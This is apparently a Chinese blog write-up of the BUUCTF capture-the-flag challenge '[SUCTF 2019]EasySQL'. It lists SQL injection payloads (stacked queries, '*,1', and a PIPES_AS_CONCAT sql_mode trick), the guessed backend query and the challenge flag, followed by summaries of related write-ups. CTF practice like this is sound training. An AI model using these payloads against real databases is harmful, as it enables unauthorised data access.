buuctf-web-[SUCTF 2019]EasySQL1

最新推荐文章于 2024-06-29 10:30:40 发布
最新推荐文章于 2024-06-29 10:30:40 发布
阅读量231 收藏 1
点赞数
分类专栏: buuctfweb ctf 文章标签: spring mybatis java sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/126165817
版权

获取环境,sql注入题,随便输几个数试一下

 

 遇上不是七步法解决的sql注入,说实话没啥思路

看了其他博客的wp,推测后端显示代码为

select $_POST['query'] || flag from flag

payload可以设置为

*,1

 

 

利用堆叠注入也可

1;show databases;


1;show tables;

推测出后端代码,用上面的payload获取flag

1;set sql_mode=pipes_as_concat;select 1

把||变成拼接符,语句如下

select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

相当于是select 1 from Flag和select flag from Flag

 

 flag{779d4c9d-ed48-4933-b66f-c9b6c8fe7d0e}

 

mlws1900
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF_WEBEasySQL1
qq_45766280的博客
05-07 406
先上图 先试试 无论输入什么数字都显示一样的结果 输入flag等特殊查询语句显示 其他的则不显示任何信息 尝试一下堆叠查询,输入: 1;show databases; 试了试联合查询,输出NONONO 查一下表 1; show tables; 好了明白了,flag应该就在当前表中,但所有有关Flag表的查询都被过滤掉了。 查看了别人的wp后才明白原理。 后端代码大致如下 select $_GET['query'] || flag from flag 在这个语句中起到过滤作用的是 || 这个的
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2763
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多关于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...
Buuctf-Web-[极客大挑战 2019]EasySQL1 解题过程和思路
最新发布
gjpqwertty的博客
06-29 1079
SQL注入挑战题,目标是通过构造恶意的SQL语句来绕过身份验证或获取数据库中的敏感信息。
BUU ctf [SUCTF 2019]EasySQL 1
m0_62879498的博客
03-11 2094
[SUCTF 2019]EasySQL 1 本题是 EasySQL 但是我感觉一点都不简单 。 我们打开界面发现很像上一关的随便注,但是我尝试了 联合查询 报错注入 布尔盲注 堆叠注入 发现都不能查询到 flag 。仅仅堆叠注入可以查询的 tables 一级。 查询过大佬的博客后发现本题考查的是 sql_mode sql_mode:是一组mysql支持的基本语法及校验规则 PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解)
小宇的web博客
01-15 5752
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解) 解法1 这里先用的是万能密码,发现不能使用,然后使用堆叠注入发现能够进行 堆叠注入查询数据库 1; show databases; 查询表名 1; show tables; 这里尝试直接访问Flag 1;show columns from Flag;# 发现不行 这里是最迷的一个地方,这里大佬能够猜出查询语句 select $_GET['query'] || flag from flag 这里的||在mysql中表示或,如果
BUUCTF - [SUCTF 2019]EasySQL1
白帽子续命指南
04-26 7217
猜测后端执行语句 测试环境:BUUCTF - [SUCTF 2019]EasySQL1 通过测试发现,输入数字的时候,页面回显 输入字母页面就没有回显 而尝试执行注入语句的时候,会显示一个nonono 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。而且注入点就是这个POST参数框框,就是那个inject参数。 至少我们可以把精力全部放在这个参数上。...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过操纵这些请求参数来覆盖预定义的变量,...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 9252
SQL注入。
BUUCTF web-[SUCTF 2019]EasySQL
m0_53314778的博客
01-16 522
[SUCTF 2019]EasySQL 输入 show tables# 爆表我们发现了Flag表 1;show columns from Flag;# 查询Flag表的内容 不给我们查,应该是过滤了某些关键字。 我再试了试order by 联合联合查询,依然是返回NO,没辙,学习开始: 这题关键:要想办法让 ||不是逻辑或 解法一: 直接输入 **,1就可的flag 题解: 内置的sql语句为: sql=“select”.post[‘query’]."||flag from Flag"; 如果$post
BUUCTFWebEasySQL
qq_70434663的博客
02-28 1077
如果我们传入的username为1' or 1=1 #,随便输入password。既然知道了是单引号闭合,现在就尝试注入,首先了解一下万能用户名和密码。会用到以下的句型,如果用户与密码匹配正确则返回真值通过验证成功登录。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。所以尝试闭合方法,随便输入1、1'、1''密码随便输入即可。但输入1'时会报错,所以语句为单引号闭合。当输入1和1''时会出现以下的提示,××,××,××为两张表查询字段的数量。一般的,库验证登录注册。
buuctf-[SUCTF 2019]EasySQL 1攻略详解与思路
qq_42942226的博客
10-29 823
buuctf easysql堆叠注入 详解
BUUCTF WEB [SUCTF 2019]EasySQL1
guishengyx的博客
10-18 379
根据题目可知是注入 没有回显,排除联合查询 接着尝试布尔盲注 1' and length(database())>=1-- qwe 还是Nonono 尝试时间盲注 还是Nonono 尝试刚学的堆叠注入 发现可以执行 1;show columns from Flag;-- asd 不给查字段了 百度得知源码中的查询语句 select $post['query']||flag from Flag 输入1 拼接后可得 select 1||flag fr...
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 2662
EasySQL
BUUCTF: [SUCTF 2019]EasySQL 1
emdog的博客
10-23 198
点进链接 输入非0数字,会显示以下内容 试了万能钥匙、order by什么的也不管用。 先尝试利用堆叠方法看能不能得到什么新发现。 1;show databases; 1;show tables;# 可以看到有个Flag的表。 尝试查看表里的内容 0; show columns from Flag ; # 显示的是Nonono. 然后是一点办法都没有,看了许多大佬写的也不太看得懂 其中一种payload是*,1,就直接查询出了Flag表中的所有内容,增加了一个临时列,看结果。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值